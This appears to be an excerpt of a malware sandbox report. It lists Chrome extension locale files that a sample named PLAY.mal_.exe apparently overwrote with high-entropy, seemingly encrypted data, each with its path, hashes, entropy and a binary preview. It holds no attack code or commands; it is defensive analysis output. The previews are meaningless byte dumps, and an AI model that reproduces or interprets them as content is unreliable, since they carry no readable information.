        Preview:@ z......."=.......+.S..&..ZI....LM......A.3.S.....2R~A.M.......zG...g,^.!9...X.....,.+....b.<[.....0...D.....fn.m,q*.E.F.(....#...s.....S..V.W...V...`..~...........t....)...RIx!.K@...M;../~M....dP.$....a<...........>.(.~.)...f..K..7..zw....w@..bvd.....*=......j...=..m....c....^T.[quO...~r..".....~...9...r:cck.P..P.I.L*..y..:x.......*...8O....I.yEe.U.;>.=+..Y...........7....U[.(.3.uG..*.O..H>.....Q.,.[..Y..L...s.).....Ba.P.....4..z......h_]E.(..c<?..V..E........*.@.@.TF~._.M.C...D.H.c./....(....A.....}*.....=..%4..8...b...N......._...u..y.%}.....#.."..Q.A.........}....|..5..`!..O.&..H........>..@.q>..a...L...x*Y~....F.^.,.....BH.....9*T.8.i......#...U.......^"C..cp..+S..ej.......;.b.#uc.9/....{.S.V.Ww..O.........x.....Z!.lk.1l....H..=..@M>{O.9.n..v.p..\i.....U.y.....6.>%..\6.......-.c.#A|......^...g<.o-...!.&. ..._....W..se....o..zoF.X..Ri.+.qR.uk....k..f....S..h.....l4....1...R.U...t......Q.@..IWP...z.Y..7~U...d..3....c.A.....#'......

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\bg\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2456
        Entropy (8bit):7.922323980102477
        Encrypted:false
        SSDEEP:
        MD5:48CB14CABE85A26B2DBBB943385B4BA2
        SHA1:07F0562109082AD830FDAB4E5F32B7AF6AB54B54
        SHA-256:7067B14490E48D3FCC506F25EBDB4DE74DC5848A5697C090D8D905F19E0DACD5
        SHA-512:34C444B62297CFCEC60DFE1D27BA05D39459F4A7783D6BD7624DFE21063C1EC69FF757874BC11C3E9D03B94E7DB5BF88CFFA0DCCDD017DEBAD083F8D4A6E6CD9
        Malicious:false
        Preview:.Y...d.....;..h..r.">u.....|....B...Q....]...X..U]u.....o.T..I...1o.z.....5..,`r.=..BV.K."Su....1'..mF.YB9.B...&........E...8|.Bj..,...s^.?.}<.L........q.$.K.....W}.W....X.Ez....a.~...ts..I...x.....n Q.~.|..hzsl..;w.......E><..l...."{..X*.v.F.NR..9..Q....?...~..........y'vp.!.{....m...@...OK!.?....<Lxvp.........L..1..B..%...c.b.mC;F.R.jU1G2(....g..'.j.l..XJ....v..s~....|.I&S......).......Po..U.|. .....h......Cx`...{c..S.m..@.G._....ki..HwU...%g.A..d4n4.:."...u...${...v..q.}>..*!.(..|[..6.b....u.U.!.....iG#...j}9.Z.aQvE..g.e..X*c...vNv.*].h`..w...naw..^'.A.|OR(..Y.s.....Qm.}.IS.....;....w...."...zu..-KM.._'.y..v=.C.....i}.......-:..L:.....m...........A..5.M.;.."..G.....-..S.I....1..dQP.....S....L6..l..l.]d].!....OO.o.Wg!.I`d...7....1...@O~.q.._l...j.../.g.6>..n..q.g....f.h{.(.....L|...a....g....rV..n#.4+6#N.#.......*.z.O8.......e(\.....[..m...<...r..k .._z..Q[....P...._.|..YGn.h/.|..%.C....n.....G..a..[..}r..aD..Dr...y9.y.....d...e.S.. ..]

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\bn\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2840
        Entropy (8bit):7.930751759285476
        Encrypted:false
        SSDEEP:
        MD5:D67DFEB774C912BB5265F30536F02116
        SHA1:288B43304112BD692E606E25240F9EA032A48E2C
        SHA-256:A97812D36023B8C0DFF75EE22CC5CF0457618E3333255EB0B5CFA211407A10FF
        SHA-512:F4B651CDEB4ABE4FF2BA429823FC9C512CD520DCB69EB18E45AD51728DF905A476C5163E9AE82112B0B36FA3E3260FC0D5B0FD08092303858818B7D8F8B3897B
        Malicious:false
        Preview:.G...U.6....0.i...I..J......nb..8... ....+................a...o....s....4#.0......z......:.o.?Y.0......A..t...j...%E./...vz.|.`i..e.W.PR".|...hBg.."..G......._...\.S9.F..z.x.|.ijx....y..Sz...\.._z.....@[+...../.i.X.a.%7..cr.&#]...~c..._qL..*..f*.q.'|"..m...j.7..S.....v..]..On.......Z1N..&_...X..M..>.....].=..........,..6..Y.7*.<5........n..Y....E......xI.. j>.{.......D.hk.\.6...;...'.,..|.b.R.>..m...../.z.VO<Yq..].=Y.|..,.v.Jv..a..!s..c....r....g..#.o...q.....<..v.e+..y."..u[.Pv..v...T..#.....F..).b..,.g.C.E...r3.......8^>..v5=LS^Rm..c..Y....@.B.H"~.e..'.^..Y...rK.&.7.;..J@5]H..+....%.V..!..{.56,....o$..X........E.h..#.L}.u.HK...Q.A...(.u..gj..o...z.&....H6bWc.$ iG...^..T.=".r...4......gQ../.h...&K`...Iu#Q..[r.#Mhe@...w.S.'..-...z.\S.....J..g..._Z.GC.,,).)..`.".F..%..Cy..q..#^..1*.....5&../...<-..A*..k..1.p..Lk..\=.L..kt..xs.A..<....(..?....%o.....+A.x7e..,.o.^+.K`h.8...p.'....(g.\....E...).0.....x.U.hZ.z...xE.).A...)..t....D....$/%....I.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ca\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2008
        Entropy (8bit):7.89476032629379
        Encrypted:false
        SSDEEP:
        MD5:A58AE6A6C46BD4C37A45CF06B2FDA306
        SHA1:A15EFDFEE54C94075FE010F97729FFCD4D66DFCA
        SHA-256:06D9D23C558D2CFFE411A4EEF9B4364F58FB54A47ABC8C921ABC31F2FD658A28
        SHA-512:795DE0FCF845CCF97A176E9EDBA3C6E35F1A1CE2B93BB33DCE323E9F3211E5841AE7EF285960DD6106BEF6D9853046AB94037D73105292074A8324DDF24260C7
        Malicious:false
        Preview:.,]DT9.xd...k._.?.>..C.{@utg....5...cQ..2:..7&.-......k..R.D."h.2...2.Q..(@.O'NU.-....l..0h..y$..v.p.........o..0.;..nQ0.!...@-...`/..rH...2...4)JH\6.......N...b7.8.."..".,..W,..I..|.L..][....J.8..a..o]{/.z..M.){..8.>\B..+..8........&g_...i.+....7.K.]....R.i...uL5...F....El.....l....(`w.).]..j=.-..\....7.......1..z}.h....>.....C*I.....yu.9.H.z..Q?s.[t.*.6.8Q+......b./."awX......H....es.#a@tc.._..Q7p.y.....e...._J.Q..P,..........&/-......jk.@..~.9....G..}.$.....2.,....Mvu.".C.9.~G....s.......M..A....;M.C.!..xT...].`~.......!tE..N1.....\.....c..........^k...-:...d.....z..f..4.......g..Q...~.B]..x).1 .y[L.WH+TO..&._.u....(..D....'%.qH...^...xl1....j6."..3`.~c.?yt........}E...>........v.D..CD.\I"Q:o......\F...J...].X....8..^..*.......W~..Y._bP..5..RY.Q=..i..~......r..\..j-,.E......Q.....Ql.O'.Ux.y(.eW.(E.V\..`...>z...a.s...B.K".AI\.@.7........A\(]...Pn..>`..w.W.U.ty^...;.~sn`/.l.....R....T..U.|.!.I>..............................1..x.lJ.~..

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\cs\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1992
        Entropy (8bit):7.887653556509504
        Encrypted:false
        SSDEEP:
        MD5:435274742EC629CB85C38FDB848C6182
        SHA1:CC5311DFF4E886B27C4E28822883E75767C44B74
        SHA-256:2DAF38076380BF6EEB8257F51F79480BB831F08003924F398992D35756FBB82A
        SHA-512:05F8D6DD8CEEE55417CE9DAD9E63F8BC00FC895B8CEE00ABC31E495CEB6CF0025482684DF69FC5368C30AB2B4E68A5D10EB22A309DF25FD19C24996F0D68E6D9
        Malicious:false
        Preview:..1..%.\Y..5.o(..j.......?}..QcG.g.fu]<..Q..B..&FU9.s...["....5...|+.^r.IN..H^).o./..o...w...;b..iz.t%iZPw...kE{.7...&%.MF..`@c......X.(.Fy..M... ~..-m..`.p_0...c.lj8..C}...).N.m.#..C.{(........sT.....i~....;,I...x..P. n...A.L.D..vt.*.BVmct..V....\....Zq..D.DUy.m......,h.%.{%.2.}...r..S.aa.@....5i\.).J....4......T..:.I....z4.%.g..I.1..g.......P.W....S..S`>c,.TPp@.o.i.ho.0./}2q......;..Z`t.k.%.K..m.J3.M...}.6....kf..C..."j_....4..B..!........+L."N.....r.....].qS..m.!..r.;/..e.....9.R~.....u.U.O..5_.1D.c....[X-xb.....q.....We.&;F....-Ue.......vH...F..=.A...3....i.7..Rz.3K.>..k5VC....AOo...>+..p..8.....^4.F...MN.Vr...Oi...C....=..A.?.......9..fI...............+..........e.B.V.D..e.I...!...)...{m..94*.I..O...P#.5+.FJ%M...0..^..K.[2.V..3...t..U.....J]rg...*.I..j.....{._.b..5.....3..H...n..k_}.RG:..C...h.e`g........K..g.Pzvq...R_....|A).\R..7.I......F.suU..J..vs.b.#s.Df...L.A.8R.8.....T..U.|.!.I>...........................M..{M..:=.Zg&...:..p..S..8..

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\cy\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1880
        Entropy (8bit):7.899451264667051
        Encrypted:false
        SSDEEP:
        MD5:1F809E09170B76209666BB6B277DF192
        SHA1:1B85AD4BEF0D1AD3B472BD4F13F2A4372E197499
        SHA-256:50B8420F5E583F62B39B8FB6E369A72B6B083A5703DE5DC95A1DA607CFE94F77
        SHA-512:B4591F4515285B2E45D1BEB10578CD9D759F012C273DAE3BD5C28F8821D1D008B66FA57E0382ABE90832E9F4AAE215E3A772FA4A4E287D30F484DCD6A433D2A1
        Malicious:false
        Preview:.w..V......j}9..j.....<..vN.:st.&/.z..A"..t.b.z.+s...x.XGhyD...8.4.....)......|..?kt[../&7.5.J...o.... ...-.<..#a.?U%^.d.d.`.(..@^..O..u..J}....\0r|..&.$.#..A.~d. $.. N....97..zZ..Vm.c.l~..M%..J. ....Z.~....a.L...,.$^...".\.L.Y+.] }]..LO.{..[G.......w-.*...'....o?'.8..S.i..(.R"..3..5.z..V..%.../.K.$.:_..G....dD...5...bRb..b..].\dG:.!F..!.$....Vl....w...8.....T.!..6..S+..........Y..%...........8..>...........P.@......F....e@...G...B.=NI9.L...>Vf.k,.Fq......);.|..#5...#......B.J.....a..#9...|F..Y..|...r~.V..e..kH]...U.%S....S..p..a..4....e.=.'F.....L.r.._8..f.W...Mn.EZ.B.^Yg.H..D.[..e..F._...2S.... .>y@.J...............@_Z.j..R....\.i+.X....&.Z.$.Q]Q...|..!.2..........h3.j..=kVp...N....>....L.3h..+......j.]6...K.%.j."..~...&.-.!.c.I.^{'....Yq......-m..y(u....9...T..U.|.!.I>..........................S....R.og.).....?....H..M-n,.r.EY..Ud...)"T..0J.u<...CG.)f..v..t.]...r.f.Z.(yy...%.o...Hv.9...I....^.;`..sFm..eY..}..hA.5 `.. v`.......A

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\da\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1960
        Entropy (8bit):7.895397626922585
        Encrypted:false
        SSDEEP:
        MD5:16EC05C30596BB90ACC34E15561C233F
        SHA1:49DDD3F3FCAEB80505B9D4A10630344EE6BF8122
        SHA-256:431A928D4466D6ED51DFA9FCC8C21FBA263BBAAF674F66604DBA3850FE63A062
        SHA-512:C38389A3B814FB3564678BDF02441AB6F7967D8915BCA3287D6C247D8EE5AF3187BFA2D0F3CD8E222C5F54D2CFFD791B5A7E5193DDD8668CE0B04ECFFC7905FD
        Malicious:false
        Preview:`I...+-e".a..... ..+..0.._.)\.m...^P...f...Jqq2K...07.I..F..f=sZ...C/F.O..).W........0[. .@.D.....57.E.....r...6.gT...>......,!.E...g..[.$..$:...a.{.I.'..$..=um.(.."L[..R.......#......(..2.I....$.O~..q-...+..V..f$s.B:...X.yT..H.c.NJ.. ...].,....}.]..2UqVn..59h.}}......C.I.2/l.(.6....W..W.>.......H...j.X...W.e5.6..s.b.Q.?.....2...m-=.......6....v.Z..BE..M..........j.%..*....9/W.v.g.C...w.{...vA-P.05.......!d.^0g)8P..dz...;.....E.'Y.e.S...u,;".i.....@..O.../....%...!........M..*..f..aD[..3.........9D....n.i8.......X9_.P...B-...6...SdD)-..Bl1.u.......u... ..............#A.c..[.Pwi...[!....z.".0...%+b8.k.......a..A...m....".Df ..%.......5g......7...>.c.A$.....F.A>=QM...(..O.9.2.NLu.....eMp.h...k...x.l.v....-.58{.w",.:.C.;.T.&.w.#.LO.P..cEo...tg....4..R#..(.f........*.RA...TL.._...}h.....-.....n=.@WG.^.x..R......./.iC.u..i@...........Ba....T..U.|.!.I>.........................._...OD...s.K..*q2.!x<.....<...b.w.....{...%.S..h...{.G..Lo.O.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\de\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2104
        Entropy (8bit):7.9096595113664305
        Encrypted:false
        SSDEEP:
        MD5:06D46B8EE538BB70428DCF4E1C91D3A8
        SHA1:FCF06FC3FB2EB9328BA4B24459F1868312BB8B77
        SHA-256:C8CC2241F64F8E6CEC9C6984F4C9574F8E7B41FD00E7A9EBE4CEA3B451AEB36B
        SHA-512:480932A9FA4234ED1E40C66EA4C3036C8E6930C9A437B4B2DF4B1B5BACAE92F2505032FC722D2E41FC47308ACD7C3671A067F5F9B0F5FB7F6B3943E5373160EC
        Malicious:false
        Preview:.....Au..k.5...o].[,.89|'#>=<.P.&.E0..4b...,..tx.Cq.P..)3..(...oz ...a.R..J..?.,.-..X...6.`..uD....q......KL*.tB}7..O|.....q.E.KZ..y.(../!.`...#...lov.RO.J...4[...b......\EV..0.Xk.(..(...[B..h.....m..pE...N.f.?.a...T.......'.....l.\...f...'..l<A.jn.}..8|J.+^u....f..lw_b ....GyO2.......m..I?,..]..4.v.x..pM...fx!f..E..r.C...R4L_....|h.t.j...D.y......a]}67..g...I..f..g.2.s.m....Cn....nf.GY....n?..9......................{.h..cu..V. .o..M..\.../I5S..D...<.....n..\......?.....o...D[.U..b...2.....!....s-d.%..7..9z4^\.......&....@u..%...A..!.:.jB.e.(..C...."...y....PG..C....{n....K.f_O@]...w...F.?.x3....aPF!..... ....s....b..).........b....{l..H...{5,....n...?.......w$Z..........[.<..............5.."Ot....SK.Xx=.'.........?..pm.%Y..L....i5z.s...I..o.Vl.E........7!1.Lg..*d.t..9\.3b9=}..k..N.;..}..x..S..$Q..#Y.MHr...9f..W..qw+B.dz*.P."c......F.]..:.#Q.BJ..G-....Z...7..P...`.....,.J.l..HTZ.h..!S..N..W..Xgt.....4....<e..K_q..........\./>.=?

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\el\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2680
        Entropy (8bit):7.925960973410862
        Encrypted:false
        SSDEEP:
        MD5:B80BC20673AA11923B0CEE0DC6C7B30D
        SHA1:916D9F93183D1191C345E40C3B368A3B04FA7B52
        SHA-256:572D7DBEAE53AF95A2B51624D524A9B20CDD34DEF444524E69EA9F2B6C3FC327
        SHA-512:616C0D6B45D08951C7DD663E390868E831E79C35B26C6EFB51D771CA8492C3E892DEF6CD9FF8D59F133478CF4C097543CFB798B7C59E5A8163BB16194B3F03A6
        Malicious:false
        Preview:.Z.5.^.........SHaOH..E.3......g.9...}.SG.KP.[.oy.e>M.v.......`;.....l'<g....>N#..`a............%.a........F..k.:?.8.........=;Q3..)&....Q5.cK.....p.......v.6.KIwWA...k2...M..A]..e.$T.}I.n....5,Ve.......SW..dN..w..1..4X1L4.m....e&......L.u!B*0.[N.y...Y.W.....S...".xZ./.-.Q.`...4....c..m}_2."`....C.I...-8.,.A*.f...[Tb......%....-{a..>Yb./..>y.O.r...c...!.h...|.......w.*....zqzO3y...fP.!.C.V...`.F.0.....[ro9q...0...q....%>.. ....g..kB..V...Yl.l......?....V.....c.m."..[.G.._?..F..q...\."...e.L.1.d......4..M.|.".p.{,.:...3..6.@!3.[.RH..s.6|..l<......KM.8..UQ?.<Am"\..l3)$..rW...ha'7#.[..........?..,..O%K..7H..d....s..Z..`...4..f..R.^......AP$kv.o..vG$..gxr...6...XL....NT._H...x...8..).gA|....@...w.....P..P.h..N.+...T2...&.L..K.)".Ht...C.......C.gS.....a.......oFo[...|....b.[$Z.k.......:.H..L.r..j(....q.S....[......_T.u........}.c1.9]....)..?..r]S...[.y.5..+.:5..]..J..Z...eP|]..'..X.....2a../~.96I...s.)I.9$.M.......r.A}.?...3F..D..El..2hMG...N......

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\en\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1928
        Entropy (8bit):7.905276614454822
        Encrypted:false
        SSDEEP:
        MD5:CD9698FC3FB2BE6F388C1A9514A9DDA4
        SHA1:F57A898D9D23F39F7A71290BD09A2DDFB3D1486C
        SHA-256:A8B86202E749BA2A39B893D1A421BFC5DCCB74F2B753B66CE965ABA0DFD6313A
        SHA-512:B95B76CE11E8B178393857DEEE40BCDB210F3DE9C714F60B3351E04287AEFF75366067FDF7DEF5DB6E2E14E4A9CE1E892BC9295F68CF16F3ADCD598CA468C08F
        Malicious:false
        Preview:................?b.[.V.8A...y.-B..l..}~...qn}.............[ ...W=.%...K......P{..3>;.v...S-....IH.t..x....{.D..+..Y.......w..m8..qS.Mv0.]..l|2!N....+..R.24.1...`$.?.}..;.6......N..%FF.^..U.Y[T.,..HZb._f...u.h.#..7.6...rm.._.@.....&}...R...B...E).}....Y....1..n.........k.......Z#.T....~...........!.vA.~v@....9t...5Q....f?V.N.........96..:N.\.M_.D..+B.Wk.....9.. .V..%....XO.b.o1...@...w:.22.....p........X.............V...0Pm.n..`r./.{a.1K.R....9.8...hz.y....N..[...S...B..CRJ.o7....E.........l..#l;{...$...L.u..X...#.Q.K3?)....p..g.pV........4.".....P......s..=d!...U.....+.P...".V...v.t....-.....h.d.r..o.l:....W..U..<:..ux\D[*d..a~I....&.=.%.....L......W.@."Yy..9.....!...kKq=.B..3..q..`\..P.QS.c.=&H..E..'.%^/.k5......Q........E.7.*r..KF..!vzI;|.DAk.q.......e.Z]...59....M..b....d......iC$.8...n.F...=.\.S.{...G*...T..U.|.!.I>..........................k..=P?$.:..b.E.4..:zY.Ey...=c.....,RT....#{..%...20A..j.....b./..&#-..)........".#m.R.....W

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\en_GB\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1928
        Entropy (8bit):7.877396114414972
        Encrypted:false
        SSDEEP:
        MD5:E61768D1AA13B23BDFC2FC87537E7336
        SHA1:4F26403366EBFA9ACAE2C4CDBF6FB5C13EF044FF
        SHA-256:F35D490E5CD5426DF7F406BCF7E8BDE97B051D3038F29CE55ED09337511B58A5
        SHA-512:4BAB7C05062CF1E67D3EE369FF2843304A03DF692E3053DB030F5DEEC8F0057C94E7B60D3880345B76B3BF90F48BC5CDCEB0C7AEA0CEF8358AC5B5282475A8AD
        Malicious:false
        Preview:..~K[.'.\.&.*.,z{R...:|...(z..\.?..._.6.E.G..'.....,s...Ue..)~..0.....9k.=.....'.2.5s......A.\....#.D..x....I8..R...6l7c8..0.sV..]>.. ..u..P.w..P.... .MK,....K*..W..w..J)(.k..9C...Y....u%y.R+...y.m2..w..E6.D.......*+Li#2.4.....q.M....;...V..DTLQ..G.y.n..[_R....z.R...(.T....s.......4...C.....@.x.....C4.(.8c...(J..;W..Mp. ..A.D.-....-.7...p..i..[...Z..M..eU...r:...U;...M.9.M.......6A.%..D$h..F..r'r.D.C.@Y.u....<.v.Z.[h.....B.s.7j+.. .....]...E.5..zo&QF..>c..{6G....t...... G..U.c.j..%...^.....CXq.ByZ..O.._I............=\Aw.5..Z..z$.4..g.ih...z,..Q4f.W..N~.|....,cY...{.k|.f..a.4*..xHy......O.ox.......v>...U..7../z....+^&.a_zT..8F-_c...3X...*dK.Ml..s|..S_...x).......o...L....q....M...r..%f'..3........&.... ...7 .;......DB...y.w..q.X.\...#.....10.y......S.<.%a.......u.......v.....S9..`.^7.s..B........H...2i..,.S..g.......T..U.|.!.I>............................y"....h.$*...._..2+.......bP.".P...{..{...X."c..^1a...s7.G.N.K.6.6s.....A...I..=%C'C#\(N.k..

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\en_US\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2504
        Entropy (8bit):7.928841060497095
        Encrypted:false
        SSDEEP:
        MD5:0EB3F841297D06AF08F124001A6D04F6
        SHA1:340B41B2A1A32B837BEB4CAA30625AE83A2F5DEA
        SHA-256:0A1770FD219459A24EA5A40234EAFEBE2B1599685E2A4C1CDEBFF4E53E1547B6
        SHA-512:D525F2569D57E542D27D0432A128ABF4DB7B449895C8371479E36CF979F96CC8B33E03649F47CE356F59CAD8B8AF6B2A507C4F23D060DF230AD6778296B4E49D
        Malicious:false
        Preview:<(..4..I{.0zd..'h.^.X.m z..=!...Nf.B/.a)k.}...2bv..x^......*.2k..CLz_|J.[.l.z.c..rz...T)Y(.....Q..{.....PX.V_.P........x%........~...RJ(H..0.:.|....4..>..#.Q.u...+.....{..}+...G.)i.Us^t.i>..m{8.._&j:{t.E.3..x.=..LM..]3R..aI`...?..5..v...Kk._"..K..k.DA.E.`...hX:z./,...U0~.W(.CBds5E.v..9...7...*..2..I.3...>...k..q.l.'.H.i.q.x.~D9.\....2.`..F.vE=.C^Rn+.B..MI."..:.s..<h .&.~.#.L.....m...~FH..Of.w....T8....._..GB.....NBK..Y.'.....(......w..+.C......\y>..UW.Z ..c....w..?.w..}.mH..7.`M.....a......... xu.+~...c.*...q..r....`.{C.....q....p>5qo.:.h&;...3x.u?.K..IW+.Z}B.b....3<7..T.qp.xx....L.*>...w.)..k....{D.C..l..OW.P.....7.."d..;.K..u.......f..|...._j5=....P.Xj......-j...t.^_....f..7u...#*..|/9p..B.:.....EB.....>.^,C....qh..:?./8..m.....U....?V).$B....d<;.9...L9.{..S}.'.gh.....ye=..0k.`i.....SV...?.....F..p_5..U...;.9...<H{...:..{]/.1...| .i.t...Z%...*..B.b..`,[.u.S.3...q._...Yn.K..:....m,A`......H.......].../..Xf5&..<.xC'.....OI...Sz..`@9..n...&6..<.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\es\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2040
        Entropy (8bit):7.895262746369068
        Encrypted:false
        SSDEEP:
        MD5:ED3E0EBA18084EB616EEDE1D9A0054AB
        SHA1:EA6FE032DD0422E5BADA2A43241D51C8A732E0B7
        SHA-256:154A7315B2F1628D38AC11F5B1CF9B4BD3215327C02AE2783C274E0F7CAC02AA
        SHA-512:782C06B1D2316E46B3A0790FEB21068EE1A3ABE9E7A05ADAC17055B9B2A5447EC8396823FD57040E4D0C820F494EF0687D2D46F825DEE625F6E27C08C6F18B0E
        Malicious:false
        Preview:....U.;"...94...q.[.M.a.v=,#.Bt.h5..X..2..\9P.;`yN..R,....[=....'l.........Nc......G.....oh.Wn....A2.F...n(.:"...eYC...Z...'..>.+.\...sO..3.z.n..^.f .....m.%.t.[.;.@.C....|.v[......5=...W.....2..*$#;q...E.("..."[..L.R.rr..h.#...._..r._..\c....fL..l...:w.U.. .f..7....2..m..N.l.`...-..=L....s.b(@.0F)......d.......XY...u.Qq.USv.M<.L...3..qb...[..y...Y.7.....,[....ti/.YX....ha.c.i...!......^@C...|..O.qm.M7d..@1a....t6.......{...:.N..<^.A...XKP^....1f.....U:.ayY.|...Z......Q.L...*...{Ru...(.+K..-...A.).".y\.{...Ee.R(.......,...KoO.t.e...j(./l..Rr.i.0v.....Q?.E.>..{}fL...N.ad...S..!A.L.c..^.y......]s..VSS.6<........X{+.7...7.y.f....JrP..{..`o...L...%...#H9.4d..Z......E.|.p..F.0.....*.>...7.q..j\..o[D....F6.\...x.''..{k|.(>../.'.i7s..M.X....zv9...gd..o.4W[8],....F.....Y6...&.+.v..+_.Q..8.}.e.{..!..+o}.......lr...aq.#...#.....~.ud.]*..Q..?.W.....0.z.m....H...H$.....kAJc(...9HM.M.........}6M1......8.. CI....h.h6...74...5.&mO...T..U.|.!.I>..........

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\es_419\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2024
        Entropy (8bit):7.884125734436565
        Encrypted:false
        SSDEEP:
        MD5:D5912562DF10C211E6852E9F0D748E93
        SHA1:2542CF2B7577C650E69D1F851631E5FE907E6165
        SHA-256:7094B902EA7DF16A2D01EB7C75C349DAFCECFA6913319D6921EFD1E03E374E73
        SHA-512:34BA028D221860AF6B36677EB21E856D39F2B09F121C63EA7951B5351C25BD0C4FEBC0B06667A471B1B586424EE7B5B71F0DC2B6620F179EB5D25F93D4E3DB7C
        Malicious:false
        Preview:%c2)h..$.....A..8Rp.@.R.;.Z....HU.....].u.o.+..]..1l...i^.-.g.T.Y...2. .R.?8......8.f....J.).E}.7.e....\..tC..0PiS.X.&...v.sI......V.1Q.R.R.s..$...*".>9.....9_.....ZW.i.?...........N.....n$.'.kx.J.......'..Kl;..e.!....!}...#.;~.C...).jw~.X.D.i....$......J..p.....maGx....{...XX%G[K.f&..1.7...[.....n=k....._4W.tOT...;.w&.K....Mm...B|:C8.>p......k..wC&.[C\......r[.x......A.d..{m....l.."...!..S.H..AT..j...u..f>.:U.7.4...........d....$6.%=..J4fK.HI+...J.-. c..s8<8.fS.f.S.1..Y.?$;_...f.(.]0.V~5NE8...B...3.....b."9.....B..d<..X...1hL/.n.XU|.Y.u.\......v.Er<....v..3.<A.0.;i.....X5..{.....S.`.K.h../.H....>aE.w...,.]7...n.....:....X......\.M..f.!.......9......\.....r.:...j..Y.8..A.+...(...LX...#....$./.1...''3.f=r..+...b.....l..97*F.... 8d.E...[%v...`.^x.|=U...L.[!.!.0.+2zU.f..;\.P3.....3.PRH...?)k...V:g.....*7...A'.X!..6..`.3oW../.lT.)C.....!.%9..<.vn.E....'X.D,h.[9...K...TQ..(.;.f...n...1h}.c.../.&l..]i..=...T..U.|.!.I>..........................

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\et\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2040
        Entropy (8bit):7.897281885302038
        Encrypted:false
        SSDEEP:
        MD5:F6B6190363E81B266F58AB53887ECD7B
        SHA1:2B7A57321A1D1AFE2817457F62388443E4D07518
        SHA-256:D08B840D4DC189B58E8A6B465D26C378EABA760D2317D5656EB8537C0C80EDAF
        SHA-512:1D9EBFD5B94B8242862DF3F05AD941509B70DB1FC3ABA1C18F2521F582D64511EE3FC04394A440ED07F227EC7D86B0F65D79E073F1123CECFE3873E651BBE8DD
        Malicious:false
        Preview:Z..w.....*....2.P...h_s..W.m..y.zT.mx?]~jJ.M....@.~..>.{.*.$c/....X.,1.\.X..t...adf)OB.>.'.]."..!. u.h.0.*.P.T..K..#&.;......+D"A@^?.v*.b....H.)....n.W..vtf..uk......s.8..k$..w..y.R..,.3s.V9?RS/..2b.....{.(...}.......R.\.s%.....nD.....#..L...Jn\.d'..i.F...s....-*l..:q.....L..iQ.{..n^..F..dtD.W4"..weo.C.......P}!v.~.h.3[.j3UP.h}.ln"..'^`.......M..+.....^.h.....As.....dx...88....?I. 9...V.=.%..)..Ov.~.h..+m,.O. .W^&....r....~Mf..~Zu.2.cU.{...u.'G.^1Q..r.=p...B]....m ...q^.t...E]....g......1L...K.....|.M.k=.."...#.3.S=.p.n.~..m..i...&..}....X......#Hz.iU.v..2.j...N{.=...........TM...9..C..N......3.Vl,."iC..+!..U....... ...a.|].6.H.T`.].?... 